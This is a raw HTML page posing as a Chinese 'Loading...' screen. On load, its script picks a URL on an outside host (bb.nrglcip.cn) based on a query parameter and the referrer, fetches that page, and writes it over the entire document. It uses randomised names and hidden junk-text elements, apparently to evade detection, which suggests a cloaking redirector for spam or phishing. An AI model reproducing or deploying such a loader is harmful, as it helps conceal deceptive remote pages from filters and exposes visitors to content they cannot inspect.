<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .pQWZpLlU6 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .pQWZpLlU6 .QXBCfIsll {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .pQWZpLlU6 .content {
            line-height: 50px;
            text-align: center
        }

        .pQWZpLlU6 .img {
            width: 100%
        }

        .pQWZpLlU6 .ZNO1wxmN {
            text-align: center
        }

        .pQWZpLlU6 .ZNO1wxmN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .pQWZpLlU6 .ZNO1wxmN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .pQWZpLlU6 .ZNO1wxmN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .pQWZpLlU6 .ZNO1wxmN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .pQWZpLlU6 .ZNO1wxmN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .pQWZpLlU6 .ZNO1wxmN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .pQWZpLlU6 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZNLMCbcNm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wb7fB = ZNLMCbcNm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wb7fB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wb7fB +".html?a=share";
		}
		
        lnroBw3zU=url+"#"+new Date().getTime();
        lnroBw3zU && function() {
            $.get(lnroBw3zU, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>oLU7g7D9JIXBo3AVf1p1ji1RpqlwKRA8TKyL1opYZAbs6jO1ZlFfQsPtZT8wd9sefj95qXbTL0j1SRHp</a>
<a  href='#' style='display:none'>oLU7g7D9JIXBo3AVf1p1ji1RpqlwKRA8TKyL1opYZAbs6jO1ZlFfQsPtZT8wd9sefj95qXbTL0j1SRHp</a>
<a  href='#' style='display:none'>oLU7g7D9JIXBo3AVf1p1ji1RpqlwKRA8TKyL1opYZAbs6jO1ZlFfQsPtZT8wd9sefj95qXbTL0j1SRHp</a>
<p  style='display:none'>LnWkc42oycv9f6hqZBR0mtXh3UKSzAaexymB7Q0PnyTxxqDsdRQrBsuShY9VhLO8siguNbp1IDosPKq0lZ7R6pKIpKp</p>
<li style='display:none' >P5fapfWHvPs80HT8f7j3R</li><div class="pQWZpLlU6">
    <div class="QXBCfIsll">
        <div class="ZNO1wxmN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >OP8WIaes8eixeSorqzKDZSJz5PNOKFwcRVOcZ6lDOHQDmLUYSkx9BhLmyuHN3qB4SnDTeSi8umyssRECBsWVywS3NyMdFT</ul>
<p  style='display:none'>pUpjz6opH7EirQ</p>
<b style='display:none' >YIjNgTsaGrxMrpXMEC4AGqv4gFk8dbYemixVJFqRX</b>
<b style='display:none' >YIjNgTsaGrxMrpXMEC4AGqv4gFk8dbYemixVJFqRX</b>
<span style='display:none'>PLqp3MmItzs8DeAkGMpCk5dIHOA4bCStsVsXvvmtYY56WDl02w5EyNSbi60wObShPP2pnmvdlzk</span></body>
</html>